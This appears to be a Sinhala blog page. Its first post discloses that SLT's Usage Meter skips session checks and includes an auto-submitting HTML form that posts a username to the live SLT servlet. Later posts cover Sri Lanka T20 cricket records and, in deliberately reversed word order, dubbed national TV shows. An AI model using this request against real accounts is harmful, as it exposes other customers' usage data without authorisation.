SLT Usage Meter එක හැක් කරළද?

Is SLT Usage Meter Hacked?




මේදවස් වල හැම තැනම softwere කෑල්ලක් යනව SLT Usage Meter එක හැක් කලා කියලා.
ඇත්තටම එහෙම කරළද?
එක මේ Meter එක හදද්දි ඉතුරුවෙච්ච පුංචි හිලක්.
අපි පොඩි POST requests යැව්වහම මේ ගොයියා විස්තර ඔක්කොම පෙන්වනවා SESSION එක check කරන්නේ නෑ
ඒ කියන්නේ password ඕනෙ නෑ...

ඉක්මනට මේ හිල වහයි කියලා බලාපොරොත්තු වෙනවා.
හැබැයි ඉතින් වෙන කාහෙවත් Usage බලල මොනව කරන්නද?


භාවිතා මාපකය / Usage Meter

සේවාව / Service

පරිශීලක නාමය / User Name
මාසය 1 / Month 1
මාසය 2 / Month 2
මාසය 3 / Month 3
දිනය / Date
 "N" කියල තියෙන්නේ අද දිනේට හරියන විදිහට පෙන්නන්න කියලා system එකට කියන්න.
වෙනස් කරනවනම් month format එක ේං : OCT/2012

හැම තිස්සෙම මේපැත්තේ එන එක කරදරයි වගේ නම්, මේ පහලතියෙන code එක copy කරගන්න. ඊට පස්සේ notepad වගේ text editor එකක් open කරලා code එක paste කරලා, රතු පාටින් තියෙන "xx0000000" වෙනුවට ඔයාගේ User Name එක දාලා html document එකක් විදිහට save කරගන්න. ඒ කියන්නේ web browser එකකින් open කරන්න පුළුවන් file එකක් විදිහට. file එකේ extension එක .html උනානම් හරි.

<html>
<head>
<title>SLT Usage Meter</title>
</head>
<body>
<form name="myForm" id="myForm" action="http://webusage.slt.lk:8080/servlet/BmsWeb" method="POST">
<select name="service">
<option value="SLTBB">BROADBAND</option>
<option value="ROAM">ROAM</option>
<option value="WIFI">WIFI</option>
<option value="ISDN">ISDN</option>
<option value="PSTN">PSTN</option>
<option value="CDMA">CDMA</option>
</select>
<input name="userName" type="text" value="xx0000000">
<input name="mon1" type="text" value="N">
<input name="mon2" type="text" value="N">
<input name="mon3" type="text" value="N">
<input name="mon4" type="text" value="N">
<input name="I1" type="submit" value="submit">
</form>
<script type="text/javascript">
document.forms["myForm"].submit();
</script>
</body>
</html>

විස්සයි විස්සේ අපේ වැඩ කිඩ


 
සමස්ත ප්‍රතිඑලය
#1    තරඟ 46    ජයග්‍රහණ 33    පරාජ 12    ප්‍රතිඑල රහිත 1     ජයග්‍රාහී තරඟ ප්‍රතිශතය 71.73

ඉනිමකදී ලබාගත් වැඩිම ලකුණු

#1    260-6 (20 overs)     කෙන්යාවට එරෙහිව 14/09/2007 දින       

වැඩිම  ජයග්‍රාහී ලකුණු පරතරය

#1    172     කෙන්යාවට එරෙහිව 14/09/2007 දින   

වැඩිම  තරඟයේ වීරයා සම්මාන

#3     6     තරඟ 31    සනත් ජයසූරිය   

තරඟයකදී  වැඩිම ලකුණු

#5    නොදැවී 104      තිලකරත්න දිල්ශාන්    ඕස්ට්‍රේලියාවට එරෙහිව    06/08/2011 දින

විස්සයි විස්ස ක්‍රිකට් දිවියේ වැඩිම ලකුණු

#3    1149  තරඟ 42     මහේල ජයවර්ධන
#5    1061  තරඟ 42     තිලකරත්න දිල්ශාන්

වේගවත්ම ශතකය

#5    පන්දු 55     තිලකරත්න දිල්ශාන්    06/08/2011 දින

ඕවරයකදී වැඩිම ලකුණු

#4    29    ජෙහාන් මුබාරක්     කෙන්යා  ක්‍රීඩක Lameck Onyango ට     එරෙහිව 14/09/2007 දින   

තරඟයකදී හොඳම පන්දුයැවීම

#1    6-8     අජන්ත මෙන්ඩිස්     සිම්බාබ්වේට එරෙහිව     18/09/2012  දින
#2    6-16    අජන්ත මෙන්ඩිස්     ඕස්ට්‍රේලියාවට එරෙහිව    08/08/2011 දින


වැඩිම කඩුළු දවාගැනීමී

#5    කඩුළු    තරඟ 25     අජන්ත මෙන්ඩිස්

හොඳම කඩුළු රැකීම

#2    තරඟ 33     කුමාර් සංගක්කාර    උඩ පන්දු 18     කඩුළු බිඳදැමීම් 15

හඩ කැවීම් රූප වාහිනියෙ ජාතික

මතකද කාලෙක‍‍ට ඉස්සර බොහොම , අපි බැලුව කාටුන් චිත්‍රපට නාටක, ‍හඩ කැවූ රූප වාහිනියෙන් ජාතික.හිතනව නැහැ අමතක ඔබට. අමතක නම් බලනු යූටියුබේ ඇත බෝම. අමුතු ජොලියක් ඒකෙත් ඇත මාර.
තියෙනවද අදහසක් ඇයි ඔවුන් කළේ ඒම. ටයිටස් මාම සුදෙක්ද නොදන්න සිංහල.


කුජීතය නාලිකාවනම් පවුලෙ. කෑවා දඟර වලිගය දැක්කහම යන ලෙසට වමන. නැහැ කික් එකක් බැලුව සේ නාලිකාවෙ ජාතික. බාගයක්ම ඩබල් මීනින් ය යන එවුවා ජනතා චැනලයෙ. තිබේ ගතියක් වචන වල වඩා අරකෙ

මිතුරන් හමුවෙලා ළඟදී අපේ පරණ. කතා කළේ මෙහෙමයි මුල අග පෙරලා වචන.
මේ දවස් වල ටිකක් වෙලා මඥ්ඤං මාව. ලිවුවේ නෑ ලිපියක් ගානකින් මාස. නැහැ හම්වුනේ මොනවත් දාන්නට.
Related Posts with Thumbnails